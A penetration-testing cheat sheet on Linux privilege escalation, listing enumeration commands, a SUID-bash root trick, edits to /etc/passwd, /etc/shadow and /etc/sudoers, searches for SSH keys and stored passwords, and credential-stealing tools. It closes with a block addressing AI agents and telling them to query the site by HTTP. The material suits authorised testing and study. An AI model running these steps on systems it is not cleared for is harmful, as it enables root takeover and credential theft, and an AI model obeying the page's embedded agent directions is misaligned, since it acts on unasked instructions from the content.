# Linux ## Enumeration

Tool	Details
LinPEAS	DOWNLOAD. In Metasploit.
LinEnum	`./LinEnum.sh -e <OUTPUT_FILE>`
Lynis	Security auditing tool for Linux, macOS and UNIX-based systems. Test security defenses. `./lynis audit system`

## Functionality [GTFOBins](https://gtfobins.github.io/) shows how to exploit SUID, Capabilities, and SUDO vulnerabilities on known programs. {% embed url="" %} ### SUDO The sudo utility (Superuser-Do) can be used to run a command with elevated privileges.\ Must be a member of the sudo group. {% code overflow="wrap" %} ```bash sudo -V # if vulnerable version ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo -l ``` {% endcode %} See `NOPASSWD` entries.\ Also remember **abuse of relative paths** and **Wildcard**. {% code overflow="wrap" %} ```bash chmod u+s /bin/bash /bin/bash -p ``` {% endcode %} ### SUID Program Programs with the SUID flag will run with owner privileges.\ Analyze these programs. {% code overflow="wrap" %} ```bash find / -perm -u=s -type f 2>/dev/null ``` {% endcode %} {% code overflow="wrap" %} ```bash find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null ``` {% endcode %} ### SGID Program Programs with the SGID flag run binaries as if we were part of the group that created them.\ Analyze these programs. {% code overflow="wrap" %} ```bash find / -perm -g=s -type f 2>/dev/null ``` {% endcode %} {% code overflow="wrap" %} ```bash find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null ``` {% endcode %} ### Capabilities Capabilities are additional attributes that can be applied to processes, binaries, and services to assign specific privileges (ex., administrative).\ Analyze the presence of misconfigurations. {% code overflow="wrap" %} ```bash /usr/sbin/getcap -r / 2>/dev/null ``` {% endcode %} {% code overflow="wrap" %} ```bash find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; ``` {% endcode %} ### Groups If the user is part of some privileged groups then he can perform privileged and particularly harmful actions. {% code overflow="wrap" %} ```bash id # see groups ``` {% endcode %} * [Docker](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-groups.md#docker) * [LXD / LXC](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-groups.md#lxd-lxc) * [disk](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-groups.md#disk) * [adm](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-groups.md#adm) ### Programms See versions of various executable programs to check for Privilege Escalation exploits.\ See [CVE](/rednote/pentesting-process/cve/linux.md) section. ## Process ```bash watch -n 1 "ps -aux | grep pass" ``` ### Cron Jobs Look through the Cron Jobs if they are called editable files to be exploited. {% code overflow="wrap" %} ```bash ls -lah /etc/cron* ``` {% endcode %} {% code overflow="wrap" %} ```bash crontab -l ``` {% endcode %} {% code overflow="wrap" %} ```bash grep "CRON" /var/log/syslog cat /var/log/cron.log ``` {% endcode %} Also remember abuse via Wildcard. ### [pspy](https://github.com/DominicBreuker/pspy) Command-line tool designed to snoop around linux processes without needing root permissions. It allows you to see commands executed by other users, cron jobs, etc. while they are running. {% code overflow="wrap" %} ```bash ./pspy32 ./pspy32s # short version ``` {% endcode %} {% code overflow="wrap" %} ```bash ./pspy64 ./pspy64s # short version ``` {% endcode %} ## File ### Documents Search for sensitive information in different files, such as system password files, files in the home profile, text files saved on Desktop/Documents, temporary files, etc. {% code overflow="wrap" %} ```bash # See if readable and writable /etc/passwd /etc/shadow /etc/security/opasswd /etc/sudoers ``` {% endcode %} **Note**:\ In `/etc/passwd` and `/etc/shadow` you can remove the `x` and insert instead the output of: `openssl passwd `.\ Or you can add ` ALL=(ALL:ALL) ALL` | ` ALL=(ALL) NOPASSWD: ALL` in `/etc/sudoers`. {% code overflow="wrap" %} ```bash cat ~/.bashrc cat ~/.bash_profile ``` {% endcode %} {% code overflow="wrap" %} ```bash ls /tmp ls /var/tmp ls /dev/shm ``` {% endcode %} ### SSH keys Look for ssh keys which may also be located elsewhere in the file system. {% code overflow="wrap" %} ```bash ls ~/.ssh # check known_hosts to find out key targets ``` {% endcode %} {% code overflow="wrap" %} ```bash grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" ``` {% endcode %} {% code overflow="wrap" %} ```bash grep -rnw "ssh-rsa" /* 2>/dev/null | grep ":1" ``` {% endcode %} ### Config Search for sensitive information in configuration files. {% code overflow="wrap" %} ```bash for l in $(echo ".conf .config .cnf");do echo -e "\n-->" $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ; done ``` {% endcode %} {% code overflow="wrap" %} ```bash find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null | grep -v "lib\|fonts\|share\|core ``` {% endcode %} ### Backup Check if there are any backup files that may contain sensitive information. {% code overflow="wrap" %} ```bash find / -name ‘*.bak’ 2>/dev/null ``` {% endcode %} ### Script Also check the bash scripts. {% code overflow="wrap" %} ```bash find / -name *.sh 2>/dev/null | grep -v "doc\|lib\|headers\|share\|src\|snap"; ``` {% endcode %} ### Writable Files and Directories Check if there are any interesting writable files and folders. {% code overflow="wrap" %} ```bash find / -path /proc -prune -o -type [f/d] -perm -o+w 2>/dev/null ``` {% endcode %} {% code overflow="wrap" %} ```bash find / -writable -type [f/d] 2>/dev/null ``` {% endcode %} ### Hidden Files and Directories Check if there are any interesting hidden files and folders with sensitive information. {% code overflow="wrap" %} ```bash find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null | grep ``` {% endcode %} {% code overflow="wrap" %} ```bash find / -type d -name ".*" -ls 2>/dev/null ``` {% endcode %} ## Password

Tool	Details
LaZagne	It searches for passwords. `laZagne.py all`
mimipenguin	A tool to download the current Linux user's login password.

### Browser

Tool	Details
HackBrowserData	Extract sensitive data, including passwords, from browsers. `./hack-browser-data[.exe]` (check the `results` directory)

## Various ### History Search the command history. {% code overflow="wrap" %} ```bash cat ~/.*history ``` {% endcode %} {% code overflow="wrap" %} ```bash history ``` {% endcode %} {% code overflow="wrap" %} ```bash find / -type f $ -name *_hist -o -name *_history $ -exec ls -l {} \; 2>/dev/null ``` {% endcode %} ### Variables Check environment variables for sensitive information such as passwords or misconfiguration. {% code overflow="wrap" %} ```bash env ``` {% endcode %} {% code overflow="wrap" %} ```bash echo $PATH ``` {% endcode %} ### Library For ELFs see if you can manipulate the LD\_PRELOAD variable or the RUNPATH setting of the binaries. In Python see if you can manipulate the PYTHONPATH variable or if there are writable directories in the module import. * [LD\_PRELOAD](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-library.md#ld_preload) * [RUNPATH](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-library.md#runpath) * [PYTHONPATH](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-library.md#pythonpath) ### Passive Traffic ```bash # sudo on tcpdump sudo tcpdump -i lo -A | grep "pass" ```

Tool	Details
PCredz	Capture sensitive information from live network traffic, with tcpdump

### Restricted Shells Certain users may be assigned shells with limited functionality, such as rbash, rksh, rzsh Check executable commands and look for them in [GTFOBins](https://gtfobins.github.io/) {% code overflow="wrap" %} ```bash compgen -c ``` {% endcode %} Also try * Command injection with `` ` `` * Command Chaining with `;` `&` `|` * Variable changes (`export -p`) * Shell functions After the escape, you may need to update the path variable. {% code overflow="wrap" %} ``` export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ``` {% endcode %} ### Container Check if we are in a container {% code overflow="wrap" %} ```bash cat /proc/mounts # if there is a docker and if there are mounts with sensitive content ``` {% endcode %} Containers can be run as privileged or non-privileged. {% code overflow="wrap" %} ```bash cat /proc/1/status | grep Cap # CapPrm , CapEff e CapBnd ``` {% endcode %} Decode with capsh {% code overflow="wrap" %} ```bash capsh --decode= ``` {% endcode %} In order to exploit these capabilities, we would first have to find a privilege escalation to root in the container, then exploit a privilege container escape. ## Kernel Exploit Kernel Level.\ Depends on Kernel Version and Operating System.\ Better to compile the exploit on the target if it has gcc.\ **May cause crashes!**

Tool	Details
Linux-Exploit-Suggester	It allows you to detect kernel-level security weaknesses.

See [Linux-CVE](/rednote/pentesting-process/cve/linux.md) section. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/linux.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.